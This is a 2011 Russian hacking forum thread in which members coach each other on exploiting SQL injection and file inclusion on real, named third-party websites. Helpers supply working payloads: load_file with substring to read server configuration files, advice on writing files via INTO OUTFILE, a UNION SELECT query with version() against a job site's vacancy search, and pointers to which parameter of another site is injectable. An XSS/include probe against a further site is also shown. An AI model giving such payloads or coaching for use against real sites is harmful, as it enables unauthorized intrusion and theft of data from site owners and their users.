 |
|
04.02.2011, 14:31
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
это просто читалка файлов насколько мне известно
http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_load-file
|
|
|
04.02.2011, 20:14
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Сообщение от noviyuser
Текст отображается но только начало а потом обрывается как можно весь текст конфигурационного файла посмотреть???
Для просмотра файлов при ограничении вывода можно использовать запрос вида
Код:
select substring(load_file('/patch/to/file/file.conf'),1,100)
Где первая цифра - символ, с которого начинать вывод, вторая - количество выводимых символов
Сообщение от noviyuser
Можно ли через Load_file сделать ls -la? для просмотра папок или нужна другая комманда?
Просматривать содержимое каталогов через load_file можно только, если сервер стоит на FreeBSD. В других случаях это невозможно. Выполнять какие-то ни было команды через load_file также невозможно.
|
|
|
|
04.02.2011, 23:41
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Если работает лоадфайл, попробуй записать через INTO OUTFILE, если знаешь полный путь и есть куда записать (путь можно узнать, читая конфиг Апача, если найдешь).
|
|
|
|
04.02.2011, 23:43
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
т.к. он мне написал что пришлось захексить(насколько я понял), то into+outfile не прокатит
|
|
|
|
04.02.2011, 23:54
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Сообщение от Seravin
т.к. он мне написал что пришлось захексить(насколько я понял), то into+outfile не прокатит
Хз, я не заметил это че-то, либо он это тебе в ПМ написал.
Тогда конечно.
|
|
|
|
05.02.2011, 01:03
|
|
Познающий
Регистрация: 30.07.2010
Сообщений: 33
С нами:
8308406
Репутация:
0
|
|
Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :
т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'
На сайте: http://autolv.com/index.php?grp_id=3'
Что делать?
И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа
http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5, 6,7,8,9,10,11
Почему?
Заранее Спасибо
|
|
|
|
05.02.2011, 01:51
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Сообщение от killrok6
Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне :
т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\'
На сайте: http://autolv.com/index.php?grp_id=3'
Что делать?
Логично же - не вставлять кавычку
И в этом конкретном примере вывод получить не удастся из-за двух запросов, выполняющихся подряд:
Код:
SELECT * FROM grp_des WHERE type = 'mgr' and grp_id =6 and lang='lang2'
Код:
SELECT * FROM subgrp WHERE sts = 1 and grp = 6
Успешно можно раскрутить скулю вот тут, например:
Код:
http://autolv.com/index.php?item_id=52
Сообщение от killrok6
И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа
http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5, 6,7,8,9,10,11
Почему?
Я думаю оно работает так:
Представим 2 запроса.
Причем один из них фильтруется, а второй нет.
В оба запроса передается один и тот же параметр
Результаты первого запроса выводятся на экран, а второго - нет.
Поэтому мы можем подобрать количество полей.
Но вывод получить не удастся.
Хотя есть некая странность, и
работает, при условии, что
работать отказывается. Этого я объяснить не могу(
|
|
|
|
05.02.2011, 13:29
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
С нами:
8620247
Репутация:
0
|
|
Прошу помощи
http://stomjob.ru/index.php?sub=search_vacbyid
В поле ID вакансии подставляем '
Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Помогите подобрать поля
|
|
|
|
05.02.2011, 14:25
|
|
Новичок
Регистрация: 02.02.2011
Сообщений: 4
С нами:
8039126
Репутация:
0
|
|
Код:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String.fromCharCode%28120,115,115%29%29
Сообщение от None
Warning: include_once(config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/prem.php on line 2 Warning: include_once() [function.include]: Failed opening 'config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/prem.php on line 2 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/ontariow/www/htdocs/usercp/store/prem.php:2) in /www/ontariow/www/htdocs/usercp/store/prem.php on line 3 Fatal error: Call to undefined function sql() in /www/ontariow/www/htdocs/usercp/store/prem.php on line 4
Может мне ктонить разяснить, что сделать здесь дальше ? |
|
|
|
05.02.2011, 15:35
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Сообщение от ubi
Прошу помощи
http://stomjob.ru/index.php?sub=search_vacbyid
В поле ID вакансии подставляем '
Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Помогите подобрать поля
http://stomjob.ru/index.php?sub=show_vacancybyid
POST:
Код:
vacby_id=1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
Либо можно вбить
Код:
1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
В поле поиска вакансии
Сообщение от None
Код:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String. fromCharCode%28120,115,115%29%29
Может мне ктонить разяснить, что сделать здесь дальше ? При этом запросе надо посмотреть внимательно на ошибку:
Код:
Warning: include_once(store/javajavascriptscript:alert(String.fromCharCode(120,115,115)).php
Где текст ошибки говорит сам за себя.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
